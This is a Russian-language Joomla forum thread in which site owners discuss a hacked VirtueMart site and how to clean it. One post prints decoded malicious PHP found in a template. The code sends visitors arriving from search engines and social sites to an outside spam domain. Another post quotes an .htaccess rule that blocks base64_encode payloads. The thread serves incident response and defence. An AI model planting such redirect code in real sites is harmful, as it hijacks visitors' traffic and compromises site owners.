Облачный сервис для Joomla сайтов
Навигация: Главная Форум

Добро пожаловать, Гость
Пожалуйста Вход или Регистрация.    Забыли пароль?

Ошибка HTTP 500 +VM 2.0 безопасность.
(1 чел.) (1) Гость
ВнизСтраница: 12
Сообщения темы: Ошибка HTTP 500 +VM 2.0 безопасность.
#5818
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 7
Беда, благо я проверяю все файлы что лью на сайт антивирусом. У меня нитак давно тоже была проблема с одним компонентом, он мне снес язык на сайте и стили шаблонов. Кстати даже брал с премиум доступа - компонент купонов.
Проблема была решена бекапом сайта.
Zudva
Постов: 135
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#5830
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 0
Чеми проверяли базу то? Поделитесь.
Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#5850
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 4
Руки + голова + phpMyAdmin
ищи шифрованный код это первое что надо сделать.
В шаблоне, в модулях, в плагинах.

Поставь денвер на него закинь свой бэкап и там день и ночь ищи!
MarioN888
Постов: 37
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Украина
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6061
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 0
Дешифровал код вируса

Код:



error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta")  or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/ ",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://lpistw.4pu.com/");
exit();
}
}
}
}
}



всёравно не понимаю, что он делает, и как лечить, базу PHP MyAdminом просмотрел, подозрительного ничего не нашёл... Все ненужные модули удалены, остались наиболее важные.

Upd. смысл то понятен... ( если переходить с указанных выше поисковиков) на сайт- попадёшь на lpistw.4pu.com , вместо целевого

НО
1)http://www.suzdalini.ru/kak-udalit-virus-s-sajta.html - прочитано, как и похожие статьи...
2)Удалять постоянно вредоносный код с сайта - это страшное не комильфо, возникает вопрос, поможет ли "775" выставленное..
3)Немогу найти причину заражения , т.к не знаю где.. в базе нет ничего подозрительного.
Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Последнее редактирование: 28.10.2012 00:57 Редактировал Phantosmagor.
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6069
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 4
Дело все в том что этот код был изначально в шаблоне.
Когда ты его нашел. Это здорово!
Удали его и будет тебе счастье.
Когда ты восстанавливался из бэкапа то этот код был все еще там.
Поэтому у тебя бы неприятности.
MarioN888
Постов: 37
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской Страна, город: Украина
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
#6073
Ошибка HTTP 500 +VM 2.0 безопасность. 4 г., 1 мес. назад Репутация: 0
Вопрос в удалении - это конечно да, мол перестало пахать/хостер написал о вирусе , замени живыми файлами или вычисти те , это круто, но!

Дыру найти хочется. Перелопатил сегодня полностью весь бэкап ( все .php и .css +смотрел нет ли странных файлов типа xxx.php.png).


Upd 28.10.2012 21:00
Странно, кстати, что вообще эксплойты работают, в .htaccess:

Код:



RewriteEngine On


# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} basе64_encode[^(]*\([^)]*\) [OR] 

Phantosmagor
Постов: 16
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Последнее редактирование: 28.10.2012 20:10 Редактировал Phantosmagor.
Для добавления сообщений Вы должны зарегистрироваться или авторизоваться
 
ВверхСтраница: 12
Модераторы: Fidelity, Nikolia, cvetercom, Xemreht, mr.Hi-End
получить последние сообщения прямо на Ваш рабочий стол
Баннер